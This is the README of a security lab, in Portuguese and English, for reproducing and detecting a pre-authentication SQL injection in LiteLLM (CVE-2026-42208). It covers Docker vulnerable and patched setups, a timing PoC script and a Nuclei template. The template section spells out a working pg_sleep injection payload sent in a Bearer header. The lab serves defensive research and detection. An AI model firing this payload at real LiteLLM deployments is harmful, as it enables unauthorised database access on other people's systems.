
# Laboratório de reprodução para CVE-2026-42208, uma injeção SQL crítica de pré-autenticação no LiteLLM. Inclui ambientes vulneráveis/corrigidos baseados em Docker, exploit PoC baseado em timing e template de detecção Nuclei para testes de segurança.
Um ambiente de laboratório para reproduzir e detectar a CVE-2026-42208, uma vulnerabilidade crítica de injeção SQL de pré-autenticação no LiteLLM, onde tokens Bearer não sanitizados chegam a uma consulta PostgreSQL bruta.
| Campo | Detalhes |
|---|---|
| CVE ID | CVE-2026-42208 |
| GHSA | GHSA-r75f-5x8p-qvmc |
| CVSS | 9.3 (Crítico) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| Versões afetadas | >= 1.81.16, < 1.83.7 |
| Corrigida | v1.83.7 (consulta parametrizada) |
| CWE | CWE-89 (Injeção SQL) |
Vulnerable (v1.83.6):
POST /v1/chat/completions
Authorization: Bearer <payload> ← payload does NOT start with "sk-"
→ api_key.startswith("sk-") assertion fails (utils.py:1189)
→ caught by except Exception (utils.py:1560)
→ _handle_authentication_error(api_key=RAW_PAYLOAD)
→ _enrich_failure_metadata_with_key_info()
→ get_data(token=RAW_PAYLOAD, table_name="combined_view")
→ SQL: WHERE v.token = '{payload}' ← injection
Patched (v1.83.7):
Same request path, but:
→ get_data(token=hashed_token, ...)
→ SQL: WHERE v.token = $1 ← parameterized, no injection
| # | Condição | Detalhes |
|---|---|---|
| 1 | Versão LiteLLM afetada | >= 1.81.16, < 1.83.7 |
| 2 | Backend PostgreSQL | Implantações SQLite não são afetadas |
| 3 | Nenhuma autenticação necessária | Pré-autenticação; zero credenciais necessárias |
| 4 | ≥1 linha em VerificationToken | pg_sleep só dispara por linha; tabela vazia = sem atraso |
Host Machine
├── localhost:8010 ──→ Docker: litellm-vuln (v1.83.6-nightly ⚠ VULNERABLE)
│ Docker: litellm-db-vuln (PostgreSQL 15)
└── localhost:8011 ──→ Docker: litellm-patched (v1.83.7-stable ✓ PATCHED)
Docker: litellm-db-patched (PostgreSQL 15)
| Ferramenta | Instalação |
|---|---|
| Docker Desktop | docker.com |
| nuclei | brew install nuclei |
| curl, python3 | pré-instalados no macOS |
bash scripts/01-setup.sh
Quando concluído:
══════════════════════════════════════════════════════
Lab ready!
Vulnerable (v1.83.6-nightly) : http://localhost:8010
Patched (v1.83.7-stable) : http://localhost:8011
Master Key : sk-lab-master-key
Next: bash scripts/02-exploit.sh
══════════════════════════════════════════════════════
bash scripts/02-exploit.sh
Saída esperada — vulnerável (v1.83.6-nightly):
── Vulnerable (v1.83.6-nightly, port 8010) ──
Baseline : 0.031s
Injection : 6.062s (HTTP 401)
Delta : +6.031s
⚠ RESULT: pg_sleep fired — SQL INJECTION CONFIRMED (VULNERABLE)
Saída esperada — corrigida (v1.83.7-stable):
── Patched (v1.83.7-stable, port 8011) ──
Baseline : 0.028s
Injection : 0.029s (HTTP 401)
Delta : +0.001s
✓ RESULT: No significant delay — injection not executed (PATCHED)
# Vulnerable instance → should produce a [critical] finding
nuclei -t nuclei/CVE-2026-42208.yaml -u http://localhost:8010
# Patched instance → should produce no findings
nuclei -t nuclei/CVE-2026-42208.yaml -u http://localhost:8011
Vulnerável (v1.83.6-nightly):

Corrigida (v1.83.7-stable):

bash scripts/99-teardown.sh
litellm-cve-2026-42208/
├── README.md
├── VULNERABILITY_ANALYSIS.md # Code-level analysis (English)
├── LAB_SETUP_GUIDE.md # Lab setup guide (English)
├── NUCLEI_TEMPLATE_GUIDE.md # Nuclei template design (English)
├── docker-compose.yaml
│
├── REPORT/ # Korean reports
│ ├── Vulnerability_Analysis_KR.md
│ ├── LAB_REPORT_KR.md
│ └── Nuclei_Template_Report_KR.md
│
├── nuclei/
│ └── CVE-2026-42208.yaml # Nuclei detection template
│
└── scripts/
├── 01-setup.sh # Start containers, create seed key
├── 02-exploit.sh # PoC: timing-based injection proof
└── 99-teardown.sh # Stop and remove all lab resources
Step 1 GET /health/liveliness
→ match "I am alive" in body
→ confirms target is a LiteLLM instance
Step 2 POST /v1/chat/completions
Authorization: Bearer ' OR (SELECT pg_sleep(6)) IS NOT NULL --
Matchers (AND — all must pass):
status == 401 eliminates 504/502 false positives
body contains "auth_error" OR "Authentication Error"
confirms LiteLLM auth path, not a proxy
duration >= 5 pg_sleep(6) fired → injection confirmed
Prevenção de falsos positivos:
status == 401 elimina respostas de timeouts upstream (504) e erros de gateway (502)duration >= 5 é suficientemente alto para excluir jitter de rede (a linha de base é ≤0,5s)Aviso: Todas as credenciais neste laboratório são dados de teste falsos, apenas para fins de pesquisa em segurança. Nunca use em produção. Sempre obtenha autorização explícita antes de escanear sistemas que você não possui.